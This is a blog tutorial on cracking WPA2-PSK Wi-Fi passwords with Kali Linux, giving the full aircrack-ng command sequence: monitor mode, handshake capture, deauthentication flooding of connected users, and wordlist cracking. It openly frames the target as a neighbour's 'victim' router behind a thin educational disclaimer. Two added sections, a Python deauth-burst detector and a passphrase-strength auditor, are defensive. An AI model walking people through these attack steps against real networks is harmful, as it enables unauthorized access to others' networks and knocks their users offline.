How to Hack WiFi (WPA2-PSK) with Kali Linux

by time news

As promised, the “hacker series of posts” begins. We will start with the simple material and then maybe advance a little.

We start with a tutorial that will help (and hurt) a lot of people. Well, depending on your purpose, this tutorial can bring you knowledge (which is the purpose of the post), status if you like to think of yourself as a hotshot hacker and, of course, the desired Wi-Fi password.

Note: From now on, Lucas Zarzur and the portal/page and Facebook group Ciência da Computação disclaim any responsibility for acts you may commit; as already said, this post has an educational purpose.

Okay, without further ado, here we go:

It is true that we use WPA2 encryption to get greater security for our passwords, but like everything on the internet, it is not completely secure. This tutorial shows just one way (among many; I will address others in future posts) to hack WPA2 Wi-Fi with Kali Linux.

Step 1: You must have Kali Linux at hand. If you don’t have it, download it by clicking here and choose the best option for you (download as ISO or TORRENT).

Step 2: Now that Kali is downloaded, you must make a bootable USB stick (click here to find out how), as it is the most effective way to recognize the routers.

Step 3: Now you should just run Kali Linux by choosing “Live (amd64)“, as shown in image 1 below:

Picture 1

Step 4: Kali will open. Now open the terminal by pressing Ctrl + Alt + T, or simply by clicking on it, as shown in image 2 below:

Picture 2

Step 5: Time for the interesting part! Run the command ifconfig and press Enter to find out the name of your router. It will usually be wlan0, as shown in image 3 below:

Image 3

Step 6: Use the command airmon-ng check kill to close unwanted processes:

Image 4

Step 7: Now it is time to put your wireless card into monitoring mode so you can see all the traffic between the routers and the devices connected to them. To do this we create a virtual network interface with the command airmon-ng start wlan0:

Picture 5

Step 8: Now we will actually read the information collected through monitoring, with the command airodump-ng wlan0mon:

Image 6

I will not go into detail on all the information that appears. For now it is important to know that BSSID is the MAC address of the device, which in our case is the “victim’s” router; PWR is how close you are to the router (it is important to know that you cannot be far away, you have to be close); and CH is the channel the router is on:

Image 7

Note 2: Check whether the router you want to attack has WPS locked; it must show NO for this attack to take place. Run the following command to verify: wash -l wlan0mon.

Step 9: It’s time to attack! Let’s capture the main information that travels from the router with the command airodump-ng --bssid DESIRED_BSSID -c DESIRED_ROUTER_CHANNEL --write NAME_FILE_TO_WRITE_INFORMATION_DO_ROTEADOR wlan0mon. Don’t get confused; take this as an example: airodump-ng --bssid 84:AF:1S:4F:5F:AC -c 11 --write Teste2 wlan0mon, where 84:AF:1S:4F:5F:AC was the BSSID of the router I want to get the password from, 11 is the channel the router is on, and Teste2 is the name of the file I created (remember, it doesn’t matter what name you give it). See the example in image 8 below:

Figure 8

And then we will have the following result:

Picture 9

Step 10: In another terminal we will use the command aireplay-ng --deauth 100 -a DESIRED_BSSID wlan0mon to log authenticated users out so that they re-authenticate, capturing the password in the process. Enter the command and wait for the process to end:

Picture 10

If we go back to the terminal where airodump-ng is running, we notice that the upper right corner now says “WPA handshake“. This shows us that the encrypted password was captured, which is the big step toward what we want:

Image 11
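
The burst of deauthentication frames sent in step 10 is visible to anyone monitoring the air, which makes it detectable. The following is an added example, not part of the original post, that flags such bursts in frame logs; the log format, addresses, threshold and window are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical sensor log format: timestamp, frame type, BSSID, destination.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) type=(?P<type>\w+) bssid=(?P<bssid>[0-9A-Fa-f:]{17}) "
    r"dst=(?P<dst>[0-9A-Fa-f:]{17})"
)

def detect_deauth_bursts(lines, threshold=20, window=timedelta(seconds=10)):
    """Map each BSSID whose deauth count inside one sliding window reaches
    `threshold` to (start of first alerting window, peak frames per window)."""
    recent = defaultdict(deque)   # BSSID -> deauth timestamps still in window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["type"] != "deauth":
            continue              # skip malformed lines and other frame types
        ts = datetime.fromisoformat(m["ts"])
        bssid = m["bssid"].lower()
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window: # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            start, peak = alerts.get(bssid, (q[0], 0))
            alerts[bssid] = (start, max(peak, len(q)))
    return alerts

def constructed_sample():
    """Constructed log lines: one flood and one quiet network."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    stamp = lambda delta: (base + delta).isoformat(timespec="milliseconds")
    lines = [f"{stamp(timedelta())} type=beacon bssid=02:00:00:AA:BB:02 dst=ff:ff:ff:ff:ff:ff"]
    # Flood: 100 broadcast deauth frames, 100 ms apart, for one BSSID.
    for i in range(100):
        lines.append(f"{stamp(timedelta(milliseconds=100 * i))} type=deauth "
                     "bssid=02:00:00:AA:BB:01 dst=ff:ff:ff:ff:ff:ff reason=7")
    # Normal churn: three clients leaving another network, minutes apart.
    for i in range(3):
        lines.append(f"{stamp(timedelta(minutes=5 * i))} type=deauth "
                     f"bssid=02:00:00:AA:BB:02 dst=02:00:00:CC:DD:0{i} reason=3")
    return lines

if __name__ == "__main__":
    for bssid, (start, peak) in detect_deauth_bursts(constructed_sample()).items():
        print(f"ALERT {bssid}: {peak} deauth frames within 10 s, starting {start}")
```

Where the access point and clients support it, enabling 802.11w Protected Management Frames makes forged deauthentication frames ineffective, which removes the forced re-authentication this step relies on.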

Step 11: This step is not mandatory; it serves as proof that the process really works. Let me explain: this process works by trying several passwords from a list (a text file with millions of passwords). These lists can be downloaded from the internet, or you can simply use the Kali Linux standard one called rockyou, which is located at /usr/share/wordlists/rockyou.txt.gz. In this step I created a list called example_wordlist with some random passwords and my own password inside, and placed the file in Kali’s wordlists directory:

Image 12

Step 12: Yes, this step is mandatory. In the final step, the command aircrack-ng NAME_FILE_TO_WRITE_INFORMATION_DO_ROTEADOR -w /usr/share/wordlists/NOME_WORDLIST will perform the attack:

Picture 13

As we can see in image 14 below, the password has been located. Yes, the neighbor’s router password is 987654321! :S

Picture 14
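
The password in this walkthrough fell because it was in the list being tried, so the practical defence is a passphrase that no list contains and that is too long to enumerate. The following is an added example, not part of the original post, that audits a network's own passphrase for the weaknesses shown here; the wordlist is a constructed stand-in for a real one, and the 60-bit threshold is an assumed policy value.

```python
import math
import string

# Constructed stand-in for a real list such as rockyou.txt.
CONSTRUCTED_WORDLIST = {"password", "12345678", "987654321", "qwertyuiop"}

# Character classes that together make up printable ASCII (95 characters).
CLASSES = (string.ascii_lowercase, string.ascii_uppercase,
           string.digits, string.punctuation + " ")

def is_sequential(psk):
    """True when every character is exactly one step above, or one step
    below, the previous one (e.g. 'abcdefgh', '987654321')."""
    steps = {ord(b) - ord(a) for a, b in zip(psk, psk[1:])}
    return steps in ({1}, {-1})

def keyspace_bits(psk):
    """Upper bound on brute-force cost, in bits, from the classes in use."""
    alphabet = sum(len(c) for c in CLASSES if any(ch in c for ch in psk))
    return len(psk) * math.log2(alphabet) if alphabet else 0.0

def audit_psk(psk, wordlist=CONSTRUCTED_WORDLIST, min_bits=60):
    """Return findings for a passphrase; an empty list means none fired.
    min_bits is an assumed policy threshold, not a standard value."""
    findings = []
    if not 8 <= len(psk) <= 63 or any(not 32 <= ord(c) <= 126 for c in psk):
        findings.append("invalid: WPA2 passphrases are 8-63 printable ASCII characters")
    if psk in wordlist or psk.lower() in wordlist:
        findings.append("listed: appears in the wordlist, a dictionary run finds it")
    if psk.isdigit():
        findings.append(f"digits-only: at most 10^{len(psk)} candidates")
    if is_sequential(psk):
        findings.append("sequential: an alphabetical or counting run")
    if keyspace_bits(psk) < min_bits:
        findings.append(f"low-entropy: about {keyspace_bits(psk):.0f} bits, below {min_bits}")
    return findings

if __name__ == "__main__":
    for candidate in ("987654321", "tin-Harbor-42-lantern-moss"):
        print(candidate, "->", audit_psk(candidate) or "no findings")
```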

Well, that’s it! This is one of the ways to hack Wi-Fi with WPA2 encryption. Others will be posted later, and soon a video of this version will be created and posted for better understanding!

This procedure is somewhat time consuming, and how long it takes will depend on your computer and the wordlist you have. I advise you to carry out the tests at a time when the computer is not needed, since the internet will be disabled during the entire process, as it tries to connect to the Wi-Fi of the attack, in addition to being a process that can (and should) take hours.

I hope you enjoyed it and will test it for your own knowledge; any questions, criticism and/or praise can be posted in the comments.

Share and never forget: knowledge is not a crime, a crime is not sharing it!

Until later!
